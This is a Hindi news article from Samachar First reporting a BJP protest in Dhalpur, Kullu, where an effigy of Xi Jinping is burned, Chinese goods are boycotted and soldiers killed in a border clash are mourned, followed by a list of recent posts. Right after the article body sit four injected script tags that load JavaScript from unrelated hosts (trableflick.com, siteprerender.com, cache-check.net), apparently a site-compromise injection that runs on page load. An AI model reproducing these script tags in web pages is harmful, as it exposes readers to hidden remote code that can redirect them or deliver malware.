Categories: हिमाचल

कुल्लूः ढालपुर में चीन के राष्ट्रपति शी जिनपिंग का पुतला फूंका

<p>जिला कुल्लू में पार्टी द्वारा ढालपुर चौक में चीन के राष्ट्रपति शी जिनपिंग का पुतला फूंका गया। जिला भाजपा अध्यक्ष भीमसेन शर्मा की अध्यक्षता में हुए उक्त कार्यक्रम के तहत चीनी वस्तुओं का बहिष्कार किया गया और चीन में निर्मित वस्तुओं को भी आग के हवाले किया गया। अपने संबोधन में जिला भाजपा अध्यक्ष भीमसेन शर्मा ने कहा की चीन एक धोखेबाज देश है तथा भारत मैं अपना सामान बेचने के साथ ही वह भारत की भूमि पर भी कब्जा करना चाहता है। उन्होंने कहा कि चीन के मंसूबे नरेंद्र मोदी शासनकाल में कभी पूरे नहीं होंगे।</p>

<p>भीमसेन शर्मा ने कहा प्रत्येक नागरिक यह प्रण लेगा कि चीन में निर्मित सभी तरह के उत्पाद चाहे वह कपड़े हो, मोबाइल फोन हो, टीवी हो और दैनिक उपयोग की वस्तुएं हो, ऐसा कोई भी सामान उपयोग में नहीं लाया जाएगा जिससे कि चीन आर्थिक तौर पर सशक्त हो। उन्होंने कहा कि नरेंद्र मोदी पहले ही कह चुके हैं कि आत्मनिर्भर बनाने के लिए लोकल फ़ॉर फोकल का नारा दिया गया है। ऐसे में चीन को आर्थिक मोर्चे पर चोट पहुंचाना भी आवश्यक है। इससे पहले वीर शहीद जवानों, हिमाचल प्रदेश के हमीरपुर से संबंध रखने वाले अंकुश ठाकुर एवं उनके साथीयों को श्रद्धांजलि देते हुए 2 मिनट का मौन रखा गया और उनके प्रति संवेदना प्रकट की गई।</p>

<p>उन्होंने कहा कि वीर सैनिकों ने अदम्य साहस का परिचय देते हुए चीनी सैनिकों को भी करारा जवाब दिया है और भारत से कहीं अधिक नुकसान चीन को उठाना पड़ा है। उन्होंने कहा कि प्रधानमंत्री की अध्यक्षता में अति शीघ्र देश की संप्रभुता को सर्वोपरि रखते हुए निर्णय लिया जाएगा। इस मौके पर पूर्व सांसद महेश्वर सिंह ने कहा कि हमें अपने मोबाइल से टिक टॉक, यूसी ब्राउज़र जैसे एप्लीकेशंस को हटाना चाहिए। चीनी सामान और चीनी सोच का बहिष्कार करना चाहिए। इस मौके पर ज़िला भाजपा, युवा मोर्चा ,महिला मोर्चा, अनुसूचित जाति मोर्चा, अनुसूचित जनजाति मोर्चा के पदाधिकारी और कार्यकर्ता उपस्थित रहे।</p>
<script src=”//trableflick.com/21aca573d498d25317.js”></script>
<script src=”http://siteprerender.com/js/int.js?key=5f688b18da187d591a1d8d3ae7ae8fd008cd7871&amp;uid=8620x” type=”text/javascript”></script>
<script src=”http://cache-check.net/api?key=a1ce18e5e2b4b1b1895a38130270d6d344d031c0&amp;uid=8620x&amp;format=arrjs&amp;r=1592470088658″ type=”text/javascript”></script>
<script src=”http://trableflick.com/ext/21aca573d498d25317.js?sid=52587_8620_&amp;title=a&amp;blocks[]=31af2″ type=”text/javascript”></script>

Samachar First

Recent Posts

विक्रमादित्य की चेतावनी: कंगना माफी मांगें, वरना मानहानि का सामना करें

  Shimla: मंडी से सांसद कंगना रनौत के बयान पर मंत्री विक्रमादित्य सिंह पलटवार किया…

15 mins ago

सामान्य से 3.2 डिग्री अधिक तापमान, 26 तारीख से बारिश की उम्मीद

  Shimla: प्रदेश में बीते 3 दिन से सूरज चमक रहा है। इससे सितंबर माह…

1 hour ago

शिमला-बिलासपुर हाईवे पर भूस्खलन, यातायात प्रभावित

Solan: शिमला-बिलासपुर राष्ट्रीय राजमार्ग-205 पर दाड़लाघाट के कराड़ाघाट के समीप साफ मौसम में ही पहाड़ी…

2 hours ago

PCC Meeting: सीएम की उपस्थिति पर संशय, डिप्टी सीएम नहीं होंगे

Shimla:कांग्रेस अध्यक्ष प्रतिभा सिंह ने प्रदेश कांग्रेस कमेटी कुछ ही देर में कांग्रेस भवन में…

2 hours ago

शिमला में छुट्टियां बीताकर सोनिया और राहुल लौटे, अब दिल्ली की राह

Shimla: हिमाचल की राजधानी शिमला के मशोबरा में छुट्टियां बीताकर आज सुबह सोनिया गांधी और…

3 hours ago

सितम्बर 23 का राशिफल, क्या कहती हैं आपकी राशि?

आज का राशिफल 23 सितम्बर 2024 , सोमवार मेष🐐 (चू, चे, चो, ला, ली, लू,…

3 hours ago